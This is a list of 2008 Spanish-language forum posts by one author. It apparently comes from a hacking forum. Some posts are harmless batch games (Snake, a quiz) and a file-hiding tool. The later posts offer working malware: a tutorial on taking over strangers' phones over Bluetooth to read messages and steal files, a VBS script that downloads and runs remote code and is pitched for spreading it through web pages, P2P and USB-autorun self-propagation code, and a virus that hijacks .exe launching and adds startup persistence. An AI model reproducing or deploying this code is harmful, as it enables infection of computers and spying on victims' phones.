|
Mostrar Temas
|
Páginas: 1 2 [3] 4 5
|
21
|
Programación / Scripting / Snake en Batch o_O - by Smart
|
en: 7 Septiembre 2008, 17:39 pm
|
Alguien por ahi me dijo que no se podia jugar en batch.... Pues para esos que hablan mal de Batch...aqui tienen algo xD Se trata de un Juego simple que creo que ya todos conocen: Snake.... Aunque por ahora no crece ni se alimenta, pero se mueve sola y se choca con las paredes.... Esto es lo que llevo: v1.REM A Game like the Snake REM Coded by :: SmartGenius :: color 0a mode con cols=15 lines=16 :ini :main cls echo  ÚÄÄÄÄÄÄÄÄÄÄ¿ echo  ³%p10%%p11%%p12%%p13%%p14%%p15%%p16%%p17%%p18%%p19%³ echo  ³%p20%%p21%%p22%%p23%%p24%%p25%%p26%%p27%%p28%%p29%³ echo  ³%p30%%p31%%p32%%p33%%p34%%p35%%p36%%p37%%p38%%p39%³ echo  ³%p40%%p41%%p42%%p43%%p44%%p45%%p46%%p47%%p48%%p49%³ echo  ³%p50%%p51%%p52%%p53%%p54%%p55%%p56%%p57%%p58%%p59%³ echo  ³%p60%%p61%%p62%%p63%%p64%%p65%%p66%%p67%%p68%%p69%³ echo  ³%p70%%p71%%p72%%p73%%p74%%p75%%p76%%p77%%p78%%p79%³ echo  ³%p80%%p81%%p82%%p83%%p84%%p85%%p86%%p87%%p88%%p89%³ echo  ³%p90%%p91%%p92%%p93%%p94%%p95%%p96%%p97%%p98%%p99%³ echo  ³%p100%%p101%%p102%%p103%%p104%%p105%%p106%%p107%%p108%%p109%³ echo  ÀÄÄÄÄÄÄÄÄÄÄÙ :w choice /c:wasdx /n /s /t:w,1 :a choice /c:wasdx /n /s /t:a,1 :s choice /c:wasdx /n /s /t:s,1 :d choice /c:wasdx /n /s /t:d,1 :down if %oldpos:~-2,1%==0 (goto : out) set /a newpos= %newpos:~-2%+10 :up if %oldpos:~-1,1%==1 (goto : out) set /a newpos= %newpos:~-2%-10 :rigth if %oldpos:~-1%==9 (goto : out) set /a newpos= %newpos:~-2%+1 :left if %oldpos:~-1%==0 (goto : out) set /a newpos= %newpos:~-2%-1 :out cls echo   SmartGenius echo   Corp. 2008 :echodyn :dyn2 if " %var1%"==" %texto%" set num=0 cls echo    %var1% ping -n 0,3 0.0.0.0 > nul
Necesitan del comando CHOICE para que funcione... si no lo tienen pues en internet se consigue facilito... Algo que se me olvidaba, aunque creo que ya lo habian deducido es los Controles... W = Arriba A = Izquierda S = Abajo D = Derecha X = SalirUn segundo Codigo del Mismo, pero esta vez no se mueve en Reversa ni acelera... REM A Game like the Snake REM Coded by :: SmartGenius :: color 0a mode con cols=15 lines=16 :ini :main cls echo  ÚÄÄÄÄÄÄÄÄÄÄ¿ echo  ³%p10%%p11%%p12%%p13%%p14%%p15%%p16%%p17%%p18%%p19%³ echo  ³%p20%%p21%%p22%%p23%%p24%%p25%%p26%%p27%%p28%%p29%³ echo  ³%p30%%p31%%p32%%p33%%p34%%p35%%p36%%p37%%p38%%p39%³ echo  ³%p40%%p41%%p42%%p43%%p44%%p45%%p46%%p47%%p48%%p49%³ echo  ³%p50%%p51%%p52%%p53%%p54%%p55%%p56%%p57%%p58%%p59%³ echo  ³%p60%%p61%%p62%%p63%%p64%%p65%%p66%%p67%%p68%%p69%³ echo  ³%p70%%p71%%p72%%p73%%p74%%p75%%p76%%p77%%p78%%p79%³ echo  ³%p80%%p81%%p82%%p83%%p84%%p85%%p86%%p87%%p88%%p89%³ echo  ³%p90%%p91%%p92%%p93%%p94%%p95%%p96%%p97%%p98%%p99%³ echo  ³%p100%%p101%%p102%%p103%%p104%%p105%%p106%%p107%%p108%%p109%³ echo  ÀÄÄÄÄÄÄÄÄÄÄÙ :w choice /c:adxf /n /s /t:f,1 :a choice /c:wsxf /n /s /t:f,1 :s choice /c:adxf /n /s /t:f,1 :d choice /c:wsxf /n /s /t:f,1 :down if %oldpos:~-2,1%==0 (goto : out) set /a newpos= %newpos:~-2%+10 :up if %oldpos:~-1,1%==1 (goto : out) set /a newpos= %newpos:~-2%-10 :rigth if %oldpos:~-1%==9 (goto : out) set /a newpos= %newpos:~-2%+1 :left if %oldpos:~-1%==0 (goto : out) set /a newpos= %newpos:~-2%-1 :out cls echo   SmartGenius echo   Corp. 2008 :echodyn :dyn2 if " %var1%"==" %texto%" set num=0 cls echo    %var1% ping -n 0,3 0.0.0.0 > nul
Necesito ideas, y pues tambien codigo para arreglar algunos errores que tiene y para que haga las demas funciones que necesita para que sea igual al juego original... Solo me falta hacer que crezca y se alimente.... y ya la tendria mas o menos lista...para Jugar Espero sus comentarios... Saludos.
|
|
|
22
|
Programación / Scripting / Quien Quiere Ser Millonario ??
|
en: 2 Septiembre 2008, 21:11 pm
|
jeje, un jueguito simple, pero que puede ser extendido y hacerlo mas amplio y entretenido... title Wants to be Millionarie ? - by Smart REM Simple Juego de Preguntas y Respuestas REM al estilo de Quien Quiere ser Millonario REM Coded by :: SmartGenius :: color 0a cls mode con cols=45 lines=20 call : quests > quests.txt attrib +h quests.txt >nul :main cls for /f "tokens=1-7 delims=:" %%a in ('findstr /i /c:10 %r% quests.txt' ) do ( echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo º Quien Quiere Ser Millonario ? º echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ echo Pregunta Numero %q% Puntos: %tot% echo ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍ echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³A³ ³ %%c³ ³B³ ³ %%d³ echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÙ echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³C³ ³ %%e³ ³D³ ³ %%f³ echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÙ set /p opc="Respuesta > " ) :rdn set /a rdn= ((%random%* %random%)/ %random%)+ %random% :fin cls echo Respuesta Incorrecta... echo Has perdido el Juego echo Total Acumulado: %tot% echo Presiona Cualquier tecla :fok cls echo Felicitaciones... lo has Superado. echo Acumulaste un Total de %tot% puntos. echo Presiona Cualquier tecla :quests echo 101:Cuantos Dedos tienes en la Mano : 10 : 8 : 12 : 20 : A: echo 102:Cuantos Ojos Tienes : 8 : 2 : 6 : 4 : B: echo 103:Cuantos Planetas hay en el Sistema Solar : 10 : 11 : 9 : 8 : C: echo 104:Cuantos Paises tiene Suramerica : 15 : 10 : 20 : 12 : D: echo 105:En que Planeta Vives : Marte : Tierra : Venus : Pluton : B: echo 106:Cual es el Foro Favorito de elhacker : Windows : Programas : Hacking : Software : C: echo 107:En que Ano se Descubrio America : 1492 : 1450 : 1500 : 1512 : A: echo 108:Quien es el Autor de este Juego : Shadow : Smart : Arkangel : carlitos : B: echo 109:Quien es el Mas Conocido en el foro : SDC : el-brujo : Smart : Otros : D: echo 100:En que continente se encuentra Djibuti : Africa : Asia : Europa : Antartida : A:
El juego te hace 5 preguntas y te va acumulando los puntos.... si te equivocas en una pierdes..... No repite una pregunta en el mismo juego... pero su repertorio de preguntas no es muy extendido...solo es una base a ver que les parece... Saludos.
|
|
|
23
|
Comunicaciones / Hacking Mobile / [TUTO] Como Hackear Telefonos por Bluetooth ¡¡
|
en: 16 Agosto 2008, 17:30 pm
|
Hoy enseñharemos el proceso de hackeo de un celulares a través de bluetooth, desde lo mas básico como enviarle un mensaje a su dispositivo, hasta operaciones mas avanzadas como el robo de información delicada y archivos del teléfono. También habrá un apartado sobre la seguridad y la forma de protegerse. Para empezar, debemos tener claro los siguientes conceptos: BlueHacking, BlueSnarffing, BlueBugging, así que nos leeremos un post en donde esta explicado todo esto: http://thesmartgenius.wordpress.com/2008/05/11/bluejacking-bluesnarfing-bluebugging-bluetoothing/Una vez tenemos claros los conceptos, procedemos a hacer una lista de las cosas que necesitamos para estos ataques. - Un Móvil(celular) con soporte Bluetooth - Herramientas de BlueHacking, BlueSnarfing, BlueBugging * - Algo de creatividad, paciencia, e Ingeniería social. Herramientas : http://thesmartgenius.wordpress.com/2008/05/11/herramientas-bluehacking-bluesnarfing-etc/Bien, empecemos con lo básico, el bluehacking
Para hacer esto necesitamos de una victima que tenga su teléfono funcionando, con el bluetooth prendido, en modo descubierto, y al alcance, así que sugeriría buscar lugares donde haya bastante concurrencia de gente como pueden ser Centro Comerciales, Cines y ese tipo de sitios
La Técnica del Bluejacking es el envió de mensajes sin permiso, en este caso un contacto o Nota, así que empezaremos por crear en nuestro móvil un nuevo contacto, cuyo nombre será Has sido BlueHackeado xD, y una ves guardado, se dispondrá a buscar un dispositivo al alcance para mandárselo, y a reír con la cara que pondrá la victima, ya que no sabrá de donde vino, y pensara que su móvil esta funcionando mal. También es posible no solo mandando Contactos, sino también Notas, o eventos del calendario, y allí es donde entra a jugar tu imaginación con los mensajes que escribas
BlueBugging La segunda forma de ataque es el BlueBugging, que se aprovecha de errores(bugs) en la autentificación del dispositivo bluetooth, o en su defecto por desconocimiento del usuario (victima) de la capacidad del bluetooth, lo que permite la ejecución de comandos AT en el Terminal, que permiten virtualmente controlar completamente un dispositivo. Para esta técnica nos basaremos en una aplicación muy conocida por todos como lo es el BT Info (Super Bluetooth Hack)
Link: http://rapidshare.com/files/114673088/SuperBluetoothHack1.08bySmartGenius.zipQue básicamente lo que hace es aprovechar una conexión ya establecida a través del bluetooth, ya sea con el consentimiento de la victima o a través del engaño. Hay dos maneras, que son con gente conocida y teniendo acceso al móvil, o haciéndolo en un lugar publico con una victima al azar
Lo que tienes que hacer es abrir la aplicaron en tu celular, vas a la opción de conectar y le das en buscar dispositivos, en este momento puedes pedir prestado el móvil a la victima, diciéndole que le vas a pasar alguna imagen o algo así, entonces le prendes el bluetooth y aceptas la conexión entrante desde tu móvil, allí te preguntara que si deseas acoplar el dispositivo, aceptas e introduces un código de seguridad el cual debe ser 0000, Luego en tu móvil también te preguntara por el código e introduces el código anterior, y ya se ha realizado la conexión, así que la aplicación ya mostrara las opciones para control de celular las cuales se basan en los comando AT, y varían dependiendo del modelo de móvil que quieras controlar, cabe resaltar que la aplicación funciona perfectamente controlando otros móviles SonyEricsson, en menor medida a los Nokia, y mucho menos a los Motorola. Tienes muchas opciones como revisarle los mensajes, copiar sus contactos, realizar llamadas, cambiarle el idioma, poner música y otras dependiendo del modelo de celular. Un Consejo: cuando hayas hecho la primera conexión con el móvil, después de meter la clave y ver que la aplicación se conecto, debes de desconectarlo, y luego en el móvil de la victima debes de ir hasta la configuración del bluetooth, allí buscas la lista de dispositivos, seleccionas el que tiene tu nombre y entre las opciones que salen debes escoger que nunca pregunte o que siempre te de permiso sin avisar cundo quieras conectarte. La otra forma es en un lugar público, en donde lo único que cambia es que no tiene acceso al móvil de la victima, por lo que tienes que recurrir a otras técnicas
En este caso nos podremos en el nombre de nuestro dispositivo, algo sugestivo, que incite a que la persona acepte, ya sea que escribas Servico al Cliente o cosas por el estilo, y cuando ya tengas acceso podrás hacer con el móvil lo que quieras, claro dependiendo del móvil con el que te conectes. BlueSnarfingEsta técnica es un poco más avanzada, pero va de la mano con el bluebugging y en especial con el uso del Super Bluetooth Hack. Con esta técnica básicamente lo que vamos a hacer es a copiar archivos que tenga el móvil victima, aunque sin su permiso, para esto hacemos uso de la aplicación BT File Manager
Link: http://rapidshare.com/files/111529670/BT_File_ManagerES-bySmartGenius.zip Que viene siendo una clase de cliente FTP a través del bluetooth, que aprovecha la conexión para ver todos los archivos que están en la memoria del móvil. Si ya han usado el Super Bluetooth Hack no les será difícil conectarse con otro móvil ya que es de la misma manera, buscando primero un dispositivo, acoplándose con el e introduciendo un código de seguridad, pero si es a un móvil con el que ya se habían conectado antes con la otra aplicación y lo configuraron para que no pidiera permisos, lo mas probable es que la conexión no presente problemas y los deje entrar fácilmente. La aplicación cuenta con dos opciones que son Mi Dispositivo y Dispositivos Bluetooth, pues obvio saben que es mi dispositivo, por medio del cual pueden acceder a su memoria y ver que archivos tienen; cabe resaltar que esta opción necesita que el teléfono tenga soporte JSR75 que es el que da acceso al sistema de archivos, por lo que puede que la aplicación pida permisos de lectura y escritura en su móvil, así que antes de entrar deben de darle en opciones, luego en permisos, y allí buscan los permisos de escritura y acceso a datos y los activan todos. Una vez están los permisos configurados, procedemos a entrar a la aplicación, ir a la opción de Dispositivos BT y empezar a buscar un dispositivo con el cual conectarnos, cuando hemos realizado la conexión exitosamente, tendremos acceso a los archivos del otro móvil, y solo es cosa de seleccionar el que quieres y darle a copiar, o cortar, y luego en una carpeta de tu móvil le das pegar
es tan sencillo y muy parecido al manejo de archivos en Windows, así que no les será difícil este procedimiento. Con el programa vienen todas las opciones de trabajo con archivos, como copiar, cortar, pegar, mover, renombrar o eliminar, así que solo es cuestión de ustedes decidir que hacer. Nota: Algunos modelos de teléfonos, en especial los motorola, con cuentan con los certificados suficientes par hacer uso del bluetooth a través de aplicaciones Java (JSR89) y también para el acceso al sistema de archivos (JSR75), por lo que puede que alguna de las aplicaciones de un error en algunos móviles. Apartado sobre Seguridadhttp://thesmartgenius.wordpress.com/2008/06/03/el-bluetooth-y-la-seguridad/http://gospel.endorasoft.es/bluetooth/seguridad-bluetooth/index.htmlEspero sea de su mas grande Utilidad
Att. :: SmartGenius :: Saludos
|
|
|
24
|
Programación / Scripting / Virtual Drive v 1.5 by :: SmartGenius ::
|
en: 16 Agosto 2008, 17:24 pm
|
Bueno, pensando en hacer una aplicacion que me permitiera proteger archivos en Windows pues pense en hacer una de Unidad Virtual pero que no fuese omo los demas... Estuve un rato probando codigo hasta que encontre la forma de esconder los datos en una carpeta especial del sistema que solo es accesible desde MS-DOS o montando una unidad virtual, y pues en eso se basa el codigo... El metodo lo he llamado "Credenciales" y es ideado por mi, y pues vean que ya es la version 1.5 con algunas mejoras como las gestion de varias unidades por cada usuario.... El codigo: title Virtual Drive - by : : SmartGenius : : color 0a REM Gestor de Unidad Virtual Protegida REM Proteccion Mediante Credenciales, metodo by SmartGenius REM Las Credenciales Permiten Crear una Unidad Virtual REM independiente para cada Usuario de la PC. :load cls :menu cls echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo º Gestor de Unidades Virtuales º echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³1³ ³ Abrir Unidad Virtual ³ ³2³ ³ Cerrar Unidad... ³ echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³3³ ³ Crear Unidad Nueva... ³ ³4³ ³ Eliminar Unidad... ³ echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³5³ ³ Proteger Unidad... ³ ³6³ ³ Ayuda ^& Informacion ³ echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ if %pin%==1 call : gestion open if %pin%==2 call : gestion close if %pin%==4 call : gestion delete if %pin%==5 call : gestion lock :gestion cls for /F "tokens=*" %%n in (%homedrive%\RECYCLER\ %cred%\config.cfg ) do (set num= %%n) cls echo Unidades Virtuales: %num% echo Escoja una Unidad Virtual: echo %lin11% %lin12% %lin13% echo %uni1% %uni2% %uni3% echo %lin21% %lin22% %lin23% :unis :unis2 for /F "tokens=*" %%l in (%homedrive%\RECYCLER\ %cred%\vd00 %cont%.tmf ) do (set drive= %%l) set uni %cont%=³ %cont%³ ³ Unidad %drive% ³ set lin1 %cont%=ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄ¿ set lin2 %cont%=ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÙ :credencial for /R " %homepath%\Datos de programa\Microsoft\Credentials" %%i in (. ) do (echo %%i>%temp%\cred.tmf ) for /F "tokens=7 delims=\" %%n in (%temp%\cred.tmf ) do (set cred= %%n) :first cls echo Aun no ha creado Ninguna Unidad Virtual echo Desea Crear Una ?? Si [S] No [N] md " %homedrive%\RECYCLER\ %cred%\VD001" echo 1 >%homedrive%\RECYCLER\ %cred%\config.cfg echo Z >%homedrive%\RECYCLER\ %cred%\vd001.tmf :open for /F "tokens=*" %%m in (%homedrive%\RECYCLER\ %cred%\vd00 %var%.tmf ) do (set drive= %%m) if exist " %homedrive%\RECYCLER\ %cred%\vd00 %var%\password.cfg" (call : unlock %var%) set ruta= %homedrive%\RECYCLER\ %cred%\vd00 %var% subst "%drive%" "%ruta%" start %drive% :close for /F "tokens=*" %%m in (%homedrive%\RECYCLER\ %cred%\vd00 %letra%.tmf ) do (set drive= %%m) subst "%drive%" /D :lock if exist " %homedrive%\RECYCLER\ %cred%\vd00 %virt%\password.cfg" (call : unlock %virt%) echo Introduzca un Clave para Proteger la Unidad echo %clave%>" %homedrive%\RECYCLER\ %cred%\vd00 %virt%\password.cfg" attrib +h "%homedrive%\RECYCLER\%cred%\vd00%virt%\password.cfg" echo La Clave " %clave%" ha sido establecida Exitosamente. :unlock for /F "tokens=*" %%c in (%homedrive%\RECYCLER\ %cred%\vd00 %tip%\password.cfg ) do (set word= %%c) echo La Unidad Virtual se Encuentra Protegida. echo Introduzca el Password: :help cls echo Bienvenido a la Ayuda del Programa echo La Primera vez que ejecuta la Utilidad, se crea la echo Unidad Virtual en la que se guardaran los archivos. echo El TOKEN es el Identificador de Seguridad del Usuario, echo y es diferente en cada Instalacion de Windows. echo Use la Unidad Virtual para guardar archivos y luego echo bloquee el acceso mediante la aplicacion. echo Puede crear un Maximo de 3 Unidades Virtuales por echo Si lo desea, puede establecer una contraseña para cada echo na de las Unidades Virtuales. echo Para dudas, comentarios y sugerencias favor contactar echo : : SmartGenius, Corp. 2008 : : :create cls echo Desea Crear Una Nueva Unidad Virtual?? Si [S] No [N] for /F "tokens=*" %%d in (%homedrive%\RECYCLER\ %cred%\config.cfg ) do (set num= %%d) md " %homedrive%\RECYCLER\ %cred%\vd00 %num%" echo %num% >%homedrive%\RECYCLER\ %cred%\config.cfg echo Introduzca una Letra para Asignar a la Nueva Unidad: echo %new% >%homedrive%\RECYCLER\ %cred%\vd00 %num%.tmf echo Unidad Virtual %new% creada. :delete cls echo Esta Seguro de quitar la Unidad Virtual?? Si [S] No [N] for /F "tokens=*" %%d in (%homedrive%\RECYCLER\ %cred%\config.cfg ) do (set num= %%d) del /f " %homedrive%\RECYCLER\ %cred%\vd00 %num%.tmf" rd " %homedrive%\RECYCLER\ %cred%\vd00 %num%" echo %num% >%homedrive%\RECYCLER\ %cred%\config.cfg echo Unidad Virtual Eliminada.
La credencial es le Identificador de Usuario de WINDOWS, es diferente por cada usuario sea Normal, Invitado o Administrador por lo que varia su longitud de caracteres, y ademas tambien es diferente por cada Instalaciond e WINDOWS, la verdad que fue un gran logro y en eso se basa la proteccion.. Intenten guardar datos y luego cerrrar la unidad, despues de eso los buscan desde WINDOWS y no los encontrara, solo mientras la unidad este montada... Se puede proteger la unidad, y crear otras dos mas para un total de 3 por usuario, pero no creo que se necesite mas de una... Acepto sugerencias y ayuda, o comentarios... Saludos.
|
|
|
25
|
Programación / Scripting / [HTML-VBS-Batch] Propagacion a traves de Internet ? Posible ?
|
en: 20 Julio 2008, 20:04 pm
|
Tenemos como base el siguiente codigo... http://two.xthost.info/smartgenius/codigo.txtArchivo BAT de Pruebamode con cols=60 mode con lines=20 @echo off title Propagacion a traves de Internet - By :: SmartGenius :: color 0a
:ini cls echo. echo. echo Este es un Archivo de Comandos BATCH descargado echo a traves de internet mediante un Script VBS echo insertado en una Pagina HTML. echo. echo El Script es capaz de Bajar y Ejecutar Codigo, casi echo sin permiso del Usuario... echo. echo Por ahora es Solo una idea, pero espero poder echo desarrollarlo completamente... echo. echo Un Saludo... ;) echo. pause exit El cual puede ser una serie de comandos Batch, ya sea de virus o bromas o cualquier otra cosa, o puede ser tambien cualquier otro archivo... Ahora tomemos un script VBS que nos descarga y nos ejecuta el archivo... VBS DownloaderSet aVar = CreateObject("Microsoft.XMLHTTP") aVar.Open "GET","http://two.xthost.info/smartgenius/codigo.txt",0 aVar.Send() Set sDow = CreateObject("ADODB.Stream") sDow.Mode = 3 sDow.Type = 1 sDow.Open() sDow.Write(aVar.responseBody) sDow.SaveToFile "codigo.bat",2 Set codigo = CreateObject("WScript.Shell") codigo.Run "Codigo.bat" y por ultimo una pagina HTML con codigo VBS insertado para crear archivos de texto plano en la PC... Pagina HTML Decorada...xD<HTML> <HEAD><TITLE>.:: SmartGenius - powered by iSmart ::.</TITLE> </HEAD> <BODY bgColor=#000000 text="green"> <script language="vbs"> Dim smart, archivo Set smart = CreateObject("Scripting.FileSystemObject") set archivo= smart.CreateTextFile("pepito.bat", True) archivo.WriteLine("@echo off") archivo.WriteLine("title SmartGenius") archivo.WriteLine("color 0a") archivo.WriteLine("echo Hola") archivo.WriteLine("echo Codigo de Prueba") archivo.WriteLine("pause") archivo.close </script> <center><h1>Propagacion de Code a traves de Internet</h1><br><br>Demostracion de Descarga y Ejecucion de Codigo...by :: SmartGenius ::</center> </BODY> </HTML> Entonces, la pagina HTML crea un archio en la PC, en este caso un Bat que dice prueba y no mas... La teoria seria que la pagina HTML creara y ejecutara el segundo codigo, el VBS Downloader y este se encarga de descargar y ejecutar el resto... Pueden guardar el VBS Downloader y ejecutarlo y veran como descarga y ejecuta el otro bat, y seria posible hacerlo de manera oculta agregando al final ,vbHide... Hasta aqui todo bien, lo unico que no logro hacer es crear el codigo del VBS Downloader a partir de la pagina HTML.... ya que como es un code VBS creando otro VBS es en ese momento donde hay un problema porque hay ciertos caracteres y funciones reservadas, y no logro que el code salga bien... Es por ahora una teoria, pero espero poder desarrollarla completamente y dar una nueva posibilidad de propagacion a nuestros codes... Agradeceria un poco de ayuda, de los expertos en VBS...NovLucker ??.. Un Saludo.
|
|
|
26
|
Programación / Scripting / [Batch] Nueva Propagacion P2P - by SmartGenius
|
en: 19 Julio 2008, 04:31 am
|
He visto por ahi un par de codes para realizar este tipo de propagacion pero la verdad que siempre son extensos debido a la cantidad de programas que existen para el uso de este tipo de protocolos y a la cantidad de veces que debemos copiarnos... Al igual que la propagacion por USB, pienso que este codigo puede optimizarse y mejorarse para hacerlo mas liviano y con mayor efectividad... Yo tenia pensado algo con FOR y CALL de la siguiente manera for /F %%a in (Aqui las variantes) do (call :p2p %variante%)y en el cual la funcion p2p tendra los comandos para copiarnos a los directorios compartidos por estas aplicaciones... Aqui pongo un codigo de ejemplo, a ver como podemos mejorarlo y optimizarlo... :inicial set nosotros=%0 for /F %%v in (VistaKeygen,EmoticonesMSN,SerialOffice2007,ParisXXXPhotos) do (call :p2p %%v) goto :eof
:p2p set var=%1 copy %nosotros% "%programfiles%\Grokster\My Grokster\%var%.bat" copy %nosotros% "%programfiles%\Morpheus\My Shared Folder\%var%.bat" copy %nosotros% "%programfiles%\ICQ\shared files\%var%.bat" copy %nosotros% "%programfiles%\KaZaA\My Shared Folder\%var%.bat" copy %nosotros% "%programfiles%\KaZaA Lite\My Shared Folder\%var%.bat" copy %nosotros% "%programfiles%\EDONKEY2000\incoming\%var%.bat" copy %nosotros% "%programfiles%\eMule\Incoming\%var%.bat" copy %nosotros% "%programfiles%\Filetopia3\Files\%var%.bat" copy %nosotros% "%programfiles%\appleJuice\incoming\%var%.bat" copy %nosotros% "%programfiles%\Gnucleus\Downloads\%var%.bat" copy %nosotros% "%programfiles%\LimeWire\Shared\%var%.bat" copy %nosotros% "%programfiles%\Overnet\incoming\%var%.bat" copy %nosotros% "%programfiles%\Shareaza\Downloads\%var%.bat" copy %nosotros% "%programfiles%\Swaptor\Download\%var%.bat" copy %nosotros% "%programfiles%\WinMX\My Shared Folder\%var%.bat" copy %nosotros% "%programfiles%\Tesla\Files\%var%.bat" copy %nosotros% "%programfiles%\XoloX\Downloads\%var%.bat" copy %nosotros% "%programfiles%\Rapigator\Share\%var%.bat" copy %nosotros% "%programfiles%\KMD\My Shared Folder\%var%.bat" copy %nosotros% "%programfiles%\BearShare\Shared\%var%.bat" copy %nosotros% "%programfiles%\Direct Connect\Received Files\%var%.bat" copy %nosotros% "%appdata%\Ares\My Shared Folder\%var%.bat" goto :eof
Lo veo mas corto y mas entendible que otros codigos que haya visto por ahi, pero habria que aumentar su efectividad... Espero las sugerencias... Saludos.
|
|
|
27
|
Programación / Scripting / Propagacion por USB 2 - by SmartGenius
|
en: 23 Mayo 2008, 01:27 am
|
Creo que hasta ahora es la mejor manera para copiarse y repartirse por USB, aunque es posible optimizarlo tambien usando el comando FOR... Para el uso de esto se debe hacer una llamada a la etiqueta :copiausb a traves del comando call.. Por ejemplo: call :copiausb y el code hara el resto de crear el autorun y de copiarlo a las diferentes unidades... :copiausb if exist C: call :creausb C if exist D: call :creausb D if exist E: call :creausb E if exist F: call :creausb F if exist G: call :creausb G if exist H: call :creausb H if exist I: call :creausb I if exist J: call :creausb J if exist K: call :creausb K goto :eof
:creausb copy %0 "%1:\nombre.bat" echo [Autorun] > "%1:\AutoRun.inf" echo open="nombre.bat" >> "%1:\AutoRun.inf" echo action=Abrir Pendrive >> "%1:\AutoRun.inf" echo shellexecute= "/nombre.bat" >> "%1:\AutoRun.inf" goto :eof
Ademas que puede ser extendido para que detecte mas unidades, sin extender tanto el codigo, ahorrandonos varias lineas... Para la parte del for tengo este code pero no lo he probado: FOR %%a in ( C D E F G H I J K L M ) do (if exist %%a: (call :creausb %%a)) Espero que les sea de utilidad. Saludos.
|
|
|
28
|
Programación / Scripting / [Batch] Executor, mi primer bichito"mutante"...
|
en: 23 Mayo 2008, 00:54 am
|
Bueno pues me he dedicado a hacer un code para un virusito que se encargue de deshabilitar los ejecutables, y al tiempo que muestre un mensaje de error pero al azar, para esto he usado una funcion que yo mismo me habia ideado y he usado VB para esta parte porque se ve un poco mas bonito y asi me evito problemas con el msg... Tambien he hecho que se copie por USB, e igualmente con nombres al azar, por lo que seria un poco mas dificil rastrearlo, y esto es lo que le daria la caracteristica de "mutante".. Lo he llamado Executor, pues se imaginaran porque ?? @echo off title Executor - by SmartGenius rem Virus que se encarga de deshabilitar el inicio rem de aplicaciones ejecutables o .EXE, y ademas rem de mostrar mensajes de error al azar y copiarse rem atraves de USB con nombres diferentes...
:ini if exist "%windir%\system32\exer.exe" goto main if exist "%windir%\system32\extool.exe" goto main if exist "%windir%\system32\brush.exe" goto main if exist "%windir%\system32\linux.exe" goto main if exist "%windir%\system32\herr.exe" goto main if exist "%windir%\system32\smart.exe" goto main if exist "%windir%\system32\help.exe" goto main if exist "%windir%\system32\fuck.exe" goto main if exist "%windir%\system32\hello.exe" goto main if exist "%windir%\system32\open.exe" goto main
:crea call :rdn call :name%r% copy %0 "%windir%\system32\%nam%.exe" reg add HKCR\exefile\shell\open\command /ve /t REG_SZ /d "%nam%.exe" /f reg add HKCR\exefile\shell\runas\command /ve /t REG_SZ /d "%nam%.exe" /f reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "%run%" /t REG_SZ /d "%windir%\system32\%nam%.exe" /f set my=%0 call :main ping -n 100 0.0.0.0 > nul goto ini
:rdn set p= set /a p=((%random%*%random%)+%random%)/%random% set r=%p:~-1% goto :eof
:name1 set nam= set nam=exer set run="Herramienta del Sistema" goto :eof
:name2 set nam= set nam=extool set run="Systool" goto :eof
:name3 set nam= set nam=brush set run="Ayuda" goto :eof
:name4 set nam= set nam=linux set run="Microsoft" goto :eof
:name5 set nam= set nam=herr set run="Inicio" goto :eof
:name6 set nam= set nam=smart set run="Smart" goto :eof
:name7 set nam= set nam=help set run="Mantenimiento" goto :eof
:name8 set nam= set nam=fuck set run="You" goto :eof
:name9 set nam= set nam=hello set run="Limpieza" goto :eof
:name0 set nam= set nam=open set run="Adobe" goto :eof
:main call :msgr call :copiausb goto :eof
:msgr call :rdn call :msg%r% goto :eof
:msg1 echo MsgBox "Error del Sistema. No se puede continuar.", 16, "Error del Sistema" >%temp%\msgr.vbs start %temp%\msgr.vbs goto :eof
:msg2 echo MsgBox "No se puede Abrir.", 16, "Error del Sistema" >%temp%\msgr.vbs start %temp%\msgr.vbs goto :eof
